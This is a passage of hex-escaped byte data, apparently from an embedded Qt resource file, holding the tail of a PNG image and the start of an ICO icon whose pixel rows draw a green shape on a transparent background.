-\x0d\xf7\x9c\xa5\xe0\x4f\xee\x72\xa9\x0f\xa8\xc1\x34\x63\x7f\xc6\ -\x77\xab\xd9\xe1\xce\xdb\xb6\x8c\x79\x80\xd2\x95\xfb\xd7\xa4\x4d\ -\x3d\x7a\xdc\x06\xa5\x71\xaa\x7d\x95\x37\x27\x54\x11\xf6\xfc\x99\ -\xd1\x66\xdf\xd5\xf4\x4e\x3c\xc5\x77\xda\x72\x32\xbd\xd3\xca\x23\ -\xc9\x9d\x3c\xf6\x27\x77\x5a\xb4\x2f\xb5\xd3\xa2\x03\xaa\x4e\x4b\ -\x99\xf6\x60\x7a\xf1\x9e\x14\x89\xc7\xde\xb4\x4e\x8b\xf6\xb2\x8c\ -\x2c\xde\x97\x26\x59\x42\x3c\x04\x7b\x52\x25\x4b\x58\x36\x6f\x77\ -\x52\xa7\x1f\xb6\x27\x75\xfa\x65\x57\x7a\x13\xdd\xad\xf2\x85\xf2\ -\x15\x07\xad\xb6\x29\xd9\x3f\xc4\xb6\x54\xff\x10\x9b\x92\xfd\xb4\ -\xd8\x89\xeb\x01\x21\x25\x4b\x7d\x1a\x62\x5b\xe6\xf3\x10\x9b\xd2\ -\x03\x43\xac\x4b\xf7\x27\xfd\x42\xac\xcb\x0c\x08\xb1\x2b\x35\x28\ -\xc4\xae\xcc\x97\x21\x25\xcb\x7c\x45\xbe\x0e\xe1\xf6\x41\x1b\x97\ -\x1d\x24\xe3\x92\xa5\x05\x03\x43\x4a\x97\xe9\xcf\xbc\x81\xb4\xa5\ -\x5d\xb9\x41\x21\xa5\xca\x0d\xe6\xf5\xd0\x90\x32\xe5\x07\x87\x94\ -\x29\x37\x24\xa4\x4c\x05\xc2\x74\xf9\x8a\xc3\x42\xea\x35\x98\xf0\ -\xa5\xae\x4b\x32\x50\x28\xff\x1a\xa1\x9e\x3d\x7b\x6e\xd7\xb4\x6f\ -\x67\xc1\x63\xc9\x0a\x2c\x59\xb2\x1c\x9e\x9e\x3e\x58\xba\xd4\x57\ -\xfe\xa3\xbb\xa5\xcc\xf3\x62\xda\x73\xf1\x32\x78\x2c\xf6\xc6\xc2\ -\x1f\x7e\xc4\x22\xe7\x21\x58\xf8\x65\x17\xcc\xed\xde\x0a\x0b\xbb\ -\xb5\xc6\x2f\x9f\xb4\xc6\xec\x8f\x5a\x60\x4e\x97\x56\x98\xdb\x8d\ -\x74\x6f\xad\x8d\xc9\x2f\x5d\x5b\xe1\x27\xe6\xff\xfc\x71\x1b\xcc\ -\xed\xda\x96\x65\x6d\x30\xaf\x57\x3b\x22\xd2\xad\x30\x8f\xf5\xe7\ -\x76\x25\xdd\xdb\x62\x76\xbf\x4e\x6f\x56\xa8\x45\x21\x7f\xa0\x50\ -\x9a\x10\xf7\x37\x48\x1d\x5d\x57\xfe\x93\xa1\x4a\xeb\xfd\xec\xc9\ -\x7d\xf7\xc7\x0f\x83\xdc\x9f\x44\x84\x90\x50\xa6\x43\xdd\x9f\x3e\ -\x0c\x73\x7f\x1a\x71\xdf\xfd\xf9\xe3\x70\xf7\x67\x8f\xc2\xdd\x9f\ 
-\x3e\x0a\x76\x7f\xf6\x38\xcc\x3d\xf2\xc5\x53\xf7\xd8\xe8\xe7\xee\ -\xd1\xd1\x4f\xdd\x63\xa2\x9e\xb8\x47\x46\x3e\x71\x7f\xf1\xfc\xa9\ -\xfb\x8b\x17\x4f\xdc\x63\xe2\x5e\xb8\xc7\x92\xb8\x58\x12\xfd\xcc\ -\x3d\x86\x79\xd1\x2f\x1e\x31\x7e\xec\x1e\x1b\xf9\x94\xf9\x4f\xc8\ -\x73\xf7\xd8\x18\xd6\x8f\x7a\xec\x1e\x17\xf5\xcc\x3d\x2a\xf2\x85\ -\x7b\xd4\x73\xda\x45\xc6\x34\xd7\x75\xa9\x28\x14\x85\xa2\x50\x14\ -\x8a\x42\x51\x28\x0a\x45\xa1\x28\x14\x85\xa2\x50\x14\x8a\x42\x51\ -\x28\x0a\x45\x21\x3b\xfc\xe7\x3f\xff\x07\x4f\x8b\xe6\x2a\xae\x45\ -\xc2\xb5\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\ -\x00\x00\x82\xd2\ -\x00\ -\x00\x01\x00\x02\x00\x40\x40\x00\x00\x01\x00\x20\x00\x28\x42\x00\ -\x00\x26\x00\x00\x00\x00\x00\x00\x00\x01\x00\x20\x00\x84\x40\x00\ -\x00\x4e\x42\x00\x00\x28\x00\x00\x00\x40\x00\x00\x00\x80\x00\x00\ -\x00\x01\x00\x20\x00\x00\x00\x00\x00\x00\x40\x00\x00\x12\x0b\x00\ -\x00\x12\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\ -\x01\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\x8e\x14\x00\x8d\x7e\x0b\x01\x8d\xad\x25\ -\x12\x8d\xba\x2d\x37\x8d\xc0\x31\x66\x8d\xc5\x33\x94\x8d\xc8\x35\ -\xb9\x8d\xca\x36\xd5\x8d\xcb\x37\xe6\x8d\xcb\x37\xed\x8d\xcb\x37\ -\xec\x8d\xcb\x37\xe5\x8d\xca\x36\xd5\x8d\xc8\x35\xbe\x8d\xc5\x34\ -\x9d\x8d\xc1\x31\x71\x8d\xbb\x2d\x40\x8d\xaf\x26\x16\x8d\x8a\x12\ -\x02\x8d\x9b\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x01\xff\xff\xff\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x5e\x0e\x00\x8d\xf8\x43\ -\x00\x8d\xaa\x23\x0d\x8d\xbb\x2d\x40\x8d\xc4\x32\x87\x8d\xc9\x36\ -\xc4\x8d\xcd\x39\xe8\x8d\xd0\x3a\xfa\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xd1\x3b\xfc\x8d\xce\x39\xed\x8d\xca\x36\xca\x8d\xc4\x33\ -\x8e\x8d\xbc\x2e\x47\x8d\xae\x26\x12\x8d\x0b\x00\x00\x8d\x8f\x13\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\x66\x0e\x00\x8d\xff\x49\x00\x8d\xae\x26\x13\x8d\xbe\x2f\ -\x5c\x8d\xc7\x35\xb8\x8d\xce\x39\xf0\x8d\xd2\x3b\xff\x8d\xd3\x3c\ 
-\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xcf\x39\xf4\x8d\xc9\x36\xc4\x8d\xc0\x30\x6d\x8d\xb2\x28\ -\x1c\x8d\x16\x00\x00\x8d\x9a\x19\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x00\x00\x00\x8d\xb7\x29\ -\x00\x8d\xa8\x23\x0a\x8d\xbc\x2e\x55\x8d\xc8\x35\xc0\x8d\xcf\x3a\ -\xf8\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc9\x36\ -\xcf\x8d\xbe\x2f\x66\x8d\xad\x25\x10\x8d\xc1\x30\x00\x8d\x82\x0b\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\x9e\x1c\x00\x8d\x00\x00\x00\x8d\xb6\x2a\ -\x2c\x8d\xc4\x33\xa4\x8d\xce\x39\xf4\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcf\x3a\xf9\x8d\xc6\x34\xb3\x8d\xb8\x2c\x39\x8d\x7e\x08\ -\x01\x8d\xa0\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaa\x23\x00\x8d\x9d\x1b\x04\x8d\xbc\x2e\x55\x8d\xca\x36\ -\xd7\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ 
-\xff\x8d\xd3\x3c\xff\x8d\xd2\x3c\xff\x8d\xcb\x37\xe2\x8d\xbe\x2f\ -\x6a\x8d\xa7\x21\x0a\x8d\xb1\x27\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb0\x27\ -\x00\x8d\xa5\x20\x0a\x8d\xbf\x30\x76\x8d\xcd\x38\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8d\xd2\x3a\ -\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3b\xff\x8d\xd2\x3b\xff\x8d\xd2\x3a\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xce\x39\ -\xf6\x8d\xc2\x32\x91\x8d\xaf\x26\x13\x8d\xb7\x2a\x00\x8d\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb2\x28\x00\x8d\xa9\x22\ -\x0c\x8d\xc1\x31\x88\x8d\xcf\x39\xf7\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3b\xff\x8c\xd6\x42\xff\x89\xdb\x4e\xff\x86\xe2\x5d\ -\xff\x83\xe8\x6b\xff\x81\xec\x75\xff\x80\xee\x79\xff\x80\xed\x78\ -\xff\x81\xeb\x73\xff\x83\xe7\x6b\xff\x85\xe3\x60\xff\x89\xdc\x51\ -\xff\x8b\xd6\x43\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd0\x3a\xfc\x8d\xc4\x33\xa2\x8d\xaf\x27\x16\x8d\xb8\x2b\ -\x00\x8d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xb1\x27\x00\x8d\xa5\x21\x0a\x8d\xc1\x31\ -\x8a\x8d\xcf\x3a\xf9\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\xff\x8d\xd4\x3e\xff\x89\xdc\x51\ -\xff\x82\xe9\x6f\xff\x7d\xf5\x88\xff\x7a\xfb\x97\xff\x78\xfe\x9e\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa2\xff\x78\xff\xa2\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xfe\x9f\xff\x79\xfc\x99\ -\xff\x7c\xf6\x8b\xff\x82\xeb\x72\xff\x88\xde\x55\xff\x8c\xd5\x40\ -\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfd\x8d\xc4\x33\xa1\x8d\xad\x25\ -\x13\x8d\xb5\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ 
-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaa\x23\x00\x8d\x92\x14\x04\x8d\xbf\x30\x78\x8d\xcf\x39\ -\xf8\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3d\xff\x88\xdd\x53\xff\x80\xef\x7b\xff\x7a\xfb\x98\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x79\xfc\x9a\xff\x7e\xf2\x82\ -\xff\x87\xe0\x59\xff\x8c\xd4\x3f\xff\x8d\xd3\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc2\x32\ -\x91\x8d\xa6\x21\x0a\x8d\xaf\x26\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x9e\x1c\ -\x00\x8d\xf0\x4e\x00\x8d\xbc\x2e\x54\x8d\xcd\x38\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8b\xd8\x47\ -\xff\x82\xeb\x72\xff\x7a\xfb\x98\xff\x78\xff\xa1\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ -\xff\x79\xfd\x9b\xff\x80\xee\x79\xff\x8a\xda\x4b\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xcf\x39\ -\xf7\x8d\xbf\x30\x70\x8d\x65\x00\x01\x8d\xa8\x23\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x30\x00\x00\x8d\xbc\x2d\ -\x00\x8d\xb5\x2a\x29\x8d\xc9\x36\xd4\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x88\xdd\x52\xff\x7d\xf4\x88\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7c\xf7\x8e\xff\x87\xe0\x5a\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcc\x38\xe7\x8d\xb9\x2c\x42\x8d\xc8\x35\x00\x8d\xa2\x1e\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xae\x25\x00\x8d\xa3\x1e\ -\x09\x8d\xc4\x33\x9f\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x87\xe0\x5a\xff\x7b\xf9\x92\xff\x78\xff\xa1\ 
-\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7a\xfb\x98\ -\xff\x85\xe5\x64\xff\x8d\xd3\x3d\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd2\x3c\xff\x8d\xc7\x35\xbd\x8d\xae\x25\x15\x8d\xb4\x29\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xa5\x20\x00\x8d\xcd\x39\x00\x8d\xbc\x2e\ -\x54\x8d\xce\x39\xf3\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x87\xe0\x5a\xff\x7a\xfa\x95\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ -\xff\x79\xfc\x9a\xff\x85\xe4\x63\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ 